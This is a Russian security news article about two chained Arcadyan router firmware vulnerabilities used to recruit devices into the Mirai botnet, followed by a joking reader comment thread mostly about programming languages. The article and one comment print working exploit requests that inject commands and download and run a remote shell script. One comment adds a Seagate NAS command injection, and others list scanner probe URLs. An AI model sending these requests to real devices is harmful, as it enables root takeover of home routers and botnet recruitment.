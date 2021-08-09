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Уязвимость в домашних маршрутизаторах, охватывающая 17 производителей

09.08.2021 11:04

В сети зафиксирована массовая атака на домашние маршрутизаторы, в прошивках которых используется реализация http-сервера от компании Arcadyan. Для получения управления над устройствами применяется сочетание двух уязвимостей, позволяющих удалённо выполнить произвольный код с правами root. Проблема затрагивает достаточно большой спектр ADSL-маршрутизаторов от компаний Arcadyan, ASUS и Buffalo, а также устройств, поставляемых под брендами Билайн (проблема подтверждена в Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone и других операторов связи. Отмечается, что проблема присутствует в прошивках Arcadyan уже более 10 лет и за это время успела перекочевать как минимум в 20 моделей устройств от 17 различных производителей.

Первая уязвимость CVE-2021-20090 даёт возможность обратиться к любому скрипту web-интерфейса без прохождения аутентификации. Суть уязвимость в том, что в web-интерфейсе некоторые каталоги, через которые отдаются картинки, CSS-файлы и сценарии JavaScript, доступны без аутентификации. При этом проверка каталогов, для которых разрешён доступ без аутентификации выполняется по начальной маске. Указание в путях символов "../" для перехода в родительский каталог блокируется прошивкой, но использование комбинации "..%2f" пропускается. Таким образом, имеется возможность открытия защищённых страниц при отправке запросов, подобных "http://192.168.1.1/images/..%2findex.htm".

Вторая уязвимость CVE-2021-20091 позволяет аутентифицированному пользователю внести изменения в системные настройки устройства через отправку специально оформленных параметров скрипту apply_abstract.cgi, который не осуществляет проверку наличия символа перевода строки в параметрах. Например, атакующий может при выполнении операции ping указать в поле с проверяемым IP-адресом значение "192.168.1.2%0AARC_SYS_TelnetdEnable=1" и скрипт при создании файла с настройками /tmp/etc/config/.glbcfg запишет в него строку "AARC_SYS_TelnetdEnable=1", которая активирует сервер telnetd, предоставляющий неограниченный доступ в командную оболочку с правами root. Аналогично при помощи установки параметра AARC_SYS можно выполнить любой код в системе. Первая уязвимость даёт возможность запустить проблемный скрипт без аутенитификации, обратившись к нему как "/images/..%2fapply_abstract.cgi".

Для эксплуатации уязвимостей у атакующего должна быть возможность отправки запроса на сетевой порт, на которым выполняется web-интерфейс. Судя по динамике распространения атаки многие операторы оставляют на своих устройствах доступ из внешней сети для упрощения диагностики проблем службой поддержки. При ограничении доступа к интерфейсу только для внутренней сети атака может быть совершена из внешней сети при помощи техники "DNS rebinding". Уязвимости уже активно используются для подключения маршрутизаторов к ботнету Mirai: 


   POST /images/..%2fapply_abstract.cgi HTTP/1.1  
   Connection: close  
   User-Agent: Dark  

   action=start_ping&submit_button=ping.html&
   action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0A
ARC_SYS_TelnetdEnable=1&
   %0AARC_SYS_=cd+/tmp;
   wget+http://212.192.241.72/lolol.sh;
   curl+-O+http://212.192.241.72/lolol.sh;
   chmod+777+lolol.sh;
   sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4


  1. Главная ссылка к новости (https://blogs.juniper.net/en-u...)
  2. OpenNews: Уязвимости в устройствах NETGEAR, позволяющие получить доступ без аутентификации
  3. OpenNews: Уязвимости в Cisco RV32x были "устранены" через блокировку запросов от утилиты curl
  4. OpenNews: Волна атак на клиентские маршрутизаторы
  5. OpenNews: В DSL-маршрутизаторах Asus, ZTE и Digicom выявлены предопределённые параметры входа
  6. OpenNews: Атака Cable Haunt, позволяющая получить контроль над кабельными модемами
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/55609-router
Ключевые слова: router
При перепечатке указание ссылки на opennet.ru обязательно
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  • 1.1, Аноним (1), 11:14, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +6 +/
    это какой-то дибиликон
     
     
  • 2.4, OnTheEdge (ok), 11:15, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +4 +/
    дЫры в каждый дом!
     
  • 2.88, Брат Анон (ok), 14:54, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Они говорили теперь подключение в публичных местах только по паспорту.
     

  • 1.3, Аноним (3), 11:14, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    Потому что не надо пихать коричневую поделку одного вендора везде. Решил не проявлять оригинальность и сделать как у конкурента - ошибку перетянул себе.
     
     
  • 2.6, Ruslan (??), 11:19, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +12 +/
    А надо было каждый раз с нуля веб-сервер писать для каждой модели роутера?)
     
     
  • 3.8, OnTheEdge (ok), 11:23, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• –3 +/
    надо было просто поставить nginx

    upd: сарказм!

     
     
  • 4.10, piconim (?), 11:28, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +5 +/
    который весит столько же, сколько остальная операционка в этих роутерах
     
  • 4.14, ryoken (ok), 11:50, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Вот на роутере этого мамонта только не хватает.
     
  • 4.57, anonymous (??), 13:21, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Почему сарказм? ЕМНИП, в кинетиках nginx, и ничего, все довольны. Из таких нетиповых решений, как в новости, у них SMB-сервер, пришедший на смену заброшенной Samba 3.x, но они это и не скрывают.
     
     
  • 5.73, Аноним (73), 14:12, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Компания Zyxel вообще очень серьезно относится к безопасности, судя по дефолтным паролям на админа 1234 (через несколько лет все-таки поменяли на cloud1234).
     
     
  • 6.86, YetAnotherOnanym (ok), 14:49, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Вообще-то, у зухела сразу после входа по дефолтному паролю выдаётся страница с формой для смены пароля. Да, там есть кнопка "Игнорировать", но это уже решение владельца. Так что к инженерам зухела по этому вопросу претензий быть не должно. Они предупредили и дали возможность принять меры.
     
  • 4.72, Аноним (73), 14:06, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    >  надо было просто поставить nginx

    В задачу веб-сервера не входит нормализация REQUEST_URI.

     
  • 3.27, Урри (ok), 12:13, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Причем со своими, уникальными ошибками.
     
     
  • 4.74, Аноним (-), 14:12, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Которых никто не знает, в отличии от массовых.
     
     
  • 5.81, Аноним (73), 14:25, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    "Не пугайте страусов, пол бетонный"

    Security by obscurity ("прячем голову в песок и делаем вид, что мы в ебзопасности") работает только для неуловимых Джо.
    Если роутер продукт занимает хоть сколько-нибудь значительную долю рынка - в эту группу он уже не попадает.

     
  • 5.95, Аноним (-), 15:00, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    > Которых никто не знает, в отличие от массовых.

    Надо будет злоумышленникам - узнают и применят. Это как распространять закрытый шифр или программу с закрытым исходным кодом и вместе с тем надеяться, что никто никогда не найдёт там ошибок, ведь "их никто не узнает"

     
  • 3.85, Аноним (85), 14:43, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Минимальный хттп сервер на сишечке в < 100 строк кода пишется под пиво, но если надо готовое с функционалом побогаче - их навалом в опенсорсе, зачем какое-то мутное проприетарное говно тянуть? Иначе как садомазохизмом и тупостью такое не объяснить.
     

  • 1.5, Аноним (-), 11:17, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –2 +/
    И никакой Rust бы не помог (у которого нашли точно такую же уязвимость в масках IP-адресов).
     
     
  • 2.9, OnTheEdge (ok), 11:25, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    точно такую же? уверены?
     
     
  • 3.26, Аноним (26), 12:09, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Ты еще и в сортах дыр разбираешься?
     
     
  • 4.41, OnTheEdge (ok), 12:54, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +3 +/
    было бы в чём: сишные и несишные
     
     
  • 5.66, Аноним (66), 13:57, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Вот до чего раст доводить в прошлом нормальных людей.
     
  • 5.76, Аноним (73), 14:16, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    > было бы в чём: сишные и несишные

    Сишных дыр не существует, это сказки от адептов растишки.

     
  • 2.25, Аноним (26), 12:08, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Если верить то и святая вода защитит. А ты еретик, десять плетей тебе.
     
  • 2.32, Аноним (32), 12:33, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    С одной стороны - да, забыть про urlencode можно на любой языке.
    С другой стороны - в расте приветствуется переиспользование кода в виде готовых модулей, типа https://docs.rs/url/, и там такой ошибки нет.
     
     
  • 3.38, Урри (ok), 12:48, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• –3 +/
    И сколько будет весить решение на расте? Влезет в прошивку роутера?

    А заодно насколько надежно будет работать на разных платформах, на которых работают роутеры?
    Раст обещает, что ваши arm, mips, ppc и т.д. программы скомпилятся, но не обещает, что запустятся.

    И вообще, получится хотя бы перекомпилировать ваш код через год, когда выйдет 14 новых версий раста, через одну ломающих обратную совместимость?

     
     
  • 4.52, Аноним (52), 13:11, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Щас они притащат библиотеку раста и упихают ее в 4мб флеш памяти вместе с последним ядром. Они же на расте и не такое могут. Сейчас вот прям пойдут и напишут архиватор, который на расте будет быстрее работать, чем Сишные архиваторы, а сжимать будет в 100 раз лучше.
     
     
  • 5.62, Аноним (66), 13:35, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Это математически невозможно в 100 раз.
     
     
  • 6.70, Аноним (73), 14:03, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Если взять сишный архиватор Бабушкина - то вполне.
     
  • 4.60, Аноним (32), 13:34, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +3 +/
    какой жирный тролль!

    прошивка на расте в IP-камеры - лезет https://habr.com/ru/company/erlyvideo/blog/334912/, значит и в роутер пятилетней давности влезет.

    настолько надёжно, насколько генерит бинарный код LLVM
    и никто вам ничего не "обещает". берёшь, собираешь, запускаешь. работает - в 99.99+% случаев, иначе разбираешься или пишешь на bugs.llvm.org

    получится. раст обеспечивает обратную совместимость кода, а если ломает - то это документируется
    https://doc.rust-lang.org/stable/rust-by-example/compatibility.html

     
     
  • 5.63, Аноним (66), 13:35, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    npm c node.js тоже много чего обещает. Только ничего не работает потом.
     
     
  • 6.67, Аноним (73), 13:58, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Нода - это как сишечка. Стильно, круто, олдскульно. Никакого смузи.
    Так что не в ту сторону воюете.
     
  • 5.80, Урри (ok), 14:23, 09/08/2021 Скрыто модератором
    		• –2 +/
     
  • 5.92, Аноним (52), 14:58, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Конечно лезет. Заодно LLVM с собой тащит.

    > Страница не найдена
    >Страница устарела, была удалена или не существовала вовсе

     
  • 2.71, anonymous (??), 14:04, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +3 +/
    И даже тут надо обязательно какашку в Rust кинуть. Как же без этого? Такое ощущение, что комментаторы любую новость сводят в обсирание Rust.
     
     
  • 3.79, Аноним (73), 14:21, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Есть сильное подозрение, что уязвимый код, про который речь в этой новости, был написан не на Rust.

    А это уже вина Rust - почему какой-то код на нем не написан?

     
     
  • 4.96, Аноним (52), 15:00, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    То есть ржавый не подходит для написания кода ржавого, но это не вина ржавого? Вам бы премию дали за особенности в развитии.
     
  • 3.89, Брат Анон (ok), 14:57, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Чо ты так переживаешь. Я гошник/питонер, и я минус не ставил. Так как немного есть разница между либой и языком. В либах всякое бывает, да. Язык тут не причём. Хотя я ржавого на дух не переношу.
     

  • 1.7, InuYasha (??), 11:19, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    >>многие операторы оставляют на своих устройствах доступ из внешней сети для упрощения диагностики проблем службой поддержки.

    Так точно. Видел многократно. Вернее, у домашних Быдлайнов (лажа) и Ростелегомов (дно), МГТСов (днище) такое повсеместно (особенно GovnoPON). Самое пика-пика-нтное, что, даже если поменяешь пароли на админку, для прова есть секретная админка. Но, даже если поменяешь пароль и на неё (а это не всегда возможно), то - сюрприз-сюрприз! - ротор сбросят и перепрошьют всё равно. :3

     
     
  • 2.11, OnTheEdge (ok), 11:35, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +6 +/
    > у домашних Быдлайнов

    гиги за дыры

    > Ростелегомов

    больше возможностей для эксплуатации дыр


    > МГТСов

    не дыра, а ДЫРИЩЕ!

     

  • 1.12, Аноним (12), 11:40, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –5 +/
    Неужели кто то использует эти железки без прошивки на openvrt?!
     
     
  • 2.31, Абвгдейка (?), 12:32, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +13 +/
    Никто не использует.
    В магазах обычно 2 очереди, одна за роутерами, вторая - перепрошиватся на OpenWRT.
    Если заказывать роутер через инет, то магаз за свой счет перепрошивает и присылает перепрошитый.
    Далее к этому роутеру прикрепляется специальный индиго-разрабоадмин который тщательно каждый день отслеживает новости об уязвимостях в OpenWRT и в случае обнаружения оной немедленно фиксит и накатывает апдейт.
    Кстати, забыл сказать, что в любой магазе в отделе роутеров висит большой мигающий плакат с надписью: "Уважаемые покупатели, после покупки роутера рекомендуем незамедлительно перепрошить его на OpenWRT".
     
     
  • 3.39, Аноним (-), 12:52, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Подтверждаю, а те, кому провайдер дал роутер, под который нету прошивки DD-RWT (и которые вообще невозможно своими ручками обновить), сразу выкидывают его и бегут покупать новый с DD-RWT. Пароли ставят надёжные, Telnet и UPnP отключают. Ага.
     
  • 3.40, LeNiN (ok), 12:52, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Подскажите координаты вашей параллельной вселенной, хочу жить там :)
     
     
  • 4.42, Аноним (-), 12:57, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Аноним (12) уже там живёт, а мы пока только фантазируем.
     
     
  • 5.44, Аноним (-), 13:00, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    И ещё не забудьте про WPA-TKIP, и если особо повезёт, WEP
     
  • 4.94, Брат Анон (ok), 15:00, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Гравицапу подаришь -- скажу.

    Я пока надень цак, дорогой.

     
  • 3.93, Брат Анон (ok), 14:58, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    А меня даже оштрафовали за отказ приви.... перепрошивать роутер.
     

  • 1.13, Аноним (13), 11:42, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    Опять никакого уважения к пользователям зюзерутеров, могля бы и для КДЕ эксплоитов занести.
     
  • 1.15, господин полковник АНБ (?), 11:50, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Такие уязвимости намекают о необходимости перепрошивать роутеры в OpenWRT.
     
  • 1.16, ryoken (ok), 11:51, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    >> ботнету Mirai

    Mirai это вроде по-японски "будущее" ?

     
     
  • 2.18, Аноним (52), 11:55, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Ага, 未来 будущее/грядущее.
     

  • 1.17, Аноним (52), 11:52, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +5 +/
    OpenWRT без Luci попробуйте оприходовать. Самое смешное что как-то пытались протолкнуть идею о запрете перепрошивки роутера. Теперь понятно зачем. В сэшэакии так уже запретили. Мы как всегда отстали от самых демократичных к роутерам демократам.
     
     
  • 2.19, Аноним (13), 11:56, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• –2 +/
    Там запретили программно менять параметры радиотакта (т.е. модифицировать устройство для вещания на не разрешённых частотах), а не прямо вот так, чтобы полностью прошивку заменять.
     
     
  • 3.23, Аноним (66), 12:07, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Самое забавное что у нас вещать не неразрешенных частотах тоже запрещено, но до роутеров в явном виде еще не добравлись.
     
     
  • 4.45, Аноним (52), 13:04, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Интересно ноутбук будет считаться роутером? А если там есть esim? А если по USB поключен хаб и интернет идет через него? А клавиатурная версия Рпи4 тоже роутер потому что у него есть лан порт? Смартфон это роутер когда тетерит?
     
     
  • 5.69, Аноним (66), 14:01, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    На изучай https://certificate.moscow/%D0%93%D0%BB%D0%B0� коротка да, но есть нюансы.
     
  • 5.83, Аноним (73), 14:32, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    > Интересно ноутбук будет считаться роутером? А если там есть esim? А если по USB поключен хаб и интернет идет через него? А клавиатурная версия Рпи4 тоже роутер потому что у него есть лан порт? Смартфон это роутер когда тетерит?

    Ни ноут, ни смартфон точно не выдадут такую ЭИИМ, чтобы нарушить нормативы РКН.
    У них скорее чипы сгорят от слишком высокого КСВН в антенном тракте.

     
  • 3.55, Аноним (52), 13:14, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    В настройках OpenWRT заходишь и ставишь любой регион. Хочешь Китай будет. Вещать может будет на разрешенной частоте, но например сильнее в 2 раза. Подумаешь стены у тебя в доме толстые. Чего теперь страдать что-ли?
     
     
  • 4.75, Аноним (73), 14:14, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Именно поэтому OpenWRT в цивилизованных странах вытесняется проприетарными решениями.
     
  • 3.68, Аноним (73), 14:00, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    > Там запретили программно менять параметры радиотакта (т.е. модифицировать устройство для вещания на не разрешённых частотах), а не прямо вот так, чтобы полностью прошивку заменять.

    Под предлогом первого запретили именно второе.

     

  • 1.20, Админ Анонимов (?), 11:58, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    а http-сервера от компании Arcadyan случайно не на С или С++ написан ?
     
     
  • 2.21, Плюсовик (?), 12:03, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• –2 +/
    Ты тип ошибки видел? Подобное можно написать на всех существующих и будущих языках программирования.
     
     
  • 3.22, Аноним (66), 12:06, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Просто надо было писать на Go нафиг ваш Rust
     
  • 3.28, Админ Анонимов (?), 12:17, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    так ты хочешь сказать что это были рукожопые сишники ?
     
     
  • 4.50, Плюсовик (?), 13:08, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• –2 +/
    Ты видел ошибку?

    Это логическая ошибка никак не связана с языком. Подобное я часто видел в самописных парсерах на разных языках.

     
     
  • 5.53, Аноним (52), 13:12, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Не, не, не, погоди. Священный раст должен уметь обрабатывать такие ошибки, ведь то же не Си какой-то там древний. Раст обязан понимать что от него хотят и исправлять ошибки в памяти потому что это тоже просто ошибка в памяти.
     
  • 5.56, Админ Анонимов (?), 13:17, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    бл9, народ, вы вопрос читать умеете ? спросил на каком языке написан http-сервер от Arcadyan - C/С++ или какой-то другой ? а в ответ слышно всё что угодно но не ответ на вопрос, тут вообще адекватные есть ?
     
     
  • 6.59, Урри (ok), 13:33, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Адекватные тут бывают, изредка, причем всегда новички.
    А как с нами в палате потусуются, так и крыша, того.

    Но мы все же лучше тех, из соседнего корпуса, которые совсем молодые и сюда регулярно пообщаться бегают.

     
  • 5.58, another_one (ok), 13:28, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Странно, в соседней новости поливают модные языки за логические ошибки. Но, вы не понимаете, это ДРУГОЕ!
     
     
  • 6.77, Аноним (73), 14:18, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    К языку Си неприменимо понятие "логическая ошибка".
     
  • 3.29, Урри (ok), 12:19, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• –2 +/
    На всех, кроме Раст!!11

     
  • 2.35, onanim (?), 12:42, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    на Rust, обрабатывает PHP скрипты по протоколу CGI.

    вот эксплоит:

    POST /images/..%2fapply_abstract.cgi HTTP/1.1
    Connection: close
    User-Agent: Dark

    action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0AARC_SYS_TelnetdEnable=1&%0AARC_SYS_=cd+/tmp;wget+http://212.192.241.72/lolol.sh;curl+-O+http://212.192.241.72/lolol.sh;chmod+7


    там кстати ещё один встроен, для Seagate BlackArmor NAS:

    GET /backupmgt/localJob.php?session=fail;cd+/tmp;wget+http://212.192.241.72/lolol.sh;curl+-O+http://212.192.241.72/lolol.sh;sh+lolo HTTP/1.1
    Connection: close
    Accept-Encoding: gzip, deflate
    Accept: /
    User-Agent: Dark

     
     
  • 3.36, onanim (?), 12:43, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    блин, опеннет похерил разметку и обрезал длинную строку.
    сами найдёте, кому надо.
     
  • 3.51, Админ Анонимов (?), 13:10, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    >на Rust

    так а где это посмотреть на чем написана реализация http-сервера от Arcadyan ?
    я просто предположил что это C/C++ но не уверен и поэтому спросил у сообщества, но в ответ получил какие-то говновыхлопы

     
  • 2.37, Абвгдейка (?), 12:45, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Да,случайно.
    Два Си разраба начали писать на игого и растишке, но во время писанины отвлеклись на разговор и по окончании беседы обнаружили, что 99% кода написали на Си.
    Долго они потом смеялись над этой историей, да и само требование начальника чтобы был код на игого и растишке оказалось соблюдено.
     

  • 1.24, cricon (?), 12:07, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Обожаю такие новости: мы нашли уязвимость! с её помощью можно тырить деньги, воровать продукты с холодильника и отбирать у кота рыбу - это делается вот так!!!
     
     
  • 2.33, Аноним (33), 12:40, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    А что такого, если ребята с опеннета подтянутся пользоваться этой уязвимостью, так у производителей роутеров появится большее желание дыры залатать.
     
     
  • 3.47, Аноним (-), 13:06, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Вот тут недавно Tor на Rust начали переписывать как раз благодаря анонимам с опеннета, так что - дерзайте!!
     
     
  • 4.49, Аноним (52), 13:08, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Скоро заценим есть ли жизнь на расте. Учитывая то с какой регулярностью ломают аппаратное декодирование в браузерах версия на Си сохранится как минимум еще очень долго.
     
  • 2.90, Juha (ok), 14:58, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Для этого надо зайти под root с полными правами и .....
     

  • 1.30, Урри (ok), 12:23, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    Ко мне такие еще не стучались, но это просто так, потрындеть.

    Зацените, кстати, какие школьники иногда стучатся:
    GET////remote/fgt_lang?lang=/../../../..//////////dev/

    Юзерагент зачетненький: python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.31.1.el7.x86_64, и айпишечка заодно: 45.95.147.15

     
     
  • 2.46, Аноним (-), 13:04, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Если к вам регулярно стучатся школьники, значит, с вашим именем сети (HalyavnyiInternet) или роутером что-то не так.
     
     
  • 3.48, Аноним (52), 13:07, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Воспитанные школьники стучатся. А не очень воспитанные сразу все отбирают.
     
     
  • 4.64, Урри (ok), 13:36, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Пытаются, пока только пытаются:

    GET//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
    GET//index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21
    GET//?XDEBUG_SESSION_START=phpstorm
    GET//wp-content/plugins/wp-file-manager/readme.txt
    и т.д.

     
  • 3.61, Урри (ok), 13:35, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Ну да, с роутером действительно не так - он к интернету подключен.
    Вот если отключить, то и ломиться никто не будет.
     

  • 1.34, Аноним (34), 12:40, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Что, неужели ДырЛинк не задет? :) Прям удивлен.
     
     
  • 2.43, Аноним (-), 12:59, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Мой ДырЛинк! Врага в тыл не пущу, сервер отключу!
    ...
    Стоп, тут это невозможно сделать?
     

  • 1.54, Нанобот (ok), 13:14, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Давайте же попробуем угадать, на каком языке программирования написан этот вебсервер!
     
  • 1.65, Аноним (65), 13:46, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Фурифокс 91.0 https://download-installer.cdn.mozilla.net/pub/firefox/releases/91.0/
    Аноны, ликуй!
     
     
  • 2.78, Аноним (78), 14:18, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Да здравствует новый ESR, с неотключаемым протоном, автоматическим обновлением, WebRender'ом и перелопаченными настройками...
    Мда. Замучается Tor это всё отключать.
     
     
  • 3.84, Аноним (84), 14:38, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Оттянутая резинка от трусов вернулась назад, и сильно ударила по... своего владельца.
    Всё хорошее когда-нибудь заканчивается. Добро пожаловать в реалии сегодняшней мазилы.
     
     
  • 4.97, Аноним (-), 15:02, 09/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    > Аноны, ликуй!

    А некоторые ликуют.

     

  • 1.82, Аноним (84), 14:26, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Mozilla Firefox ESR 91.0. Дождались! Дерьмо сравнялось!
     
  • 1.87, Аноним (87), 14:52, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    > ADSL

    А в dialup модемах ничего опасного не нашли? Если серьезно, уже лет 10 не слышал о них.

     
  • 1.91, YetAnotherOnanym (ok), 14:58, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Санитизация? Нет, не слышали...
     

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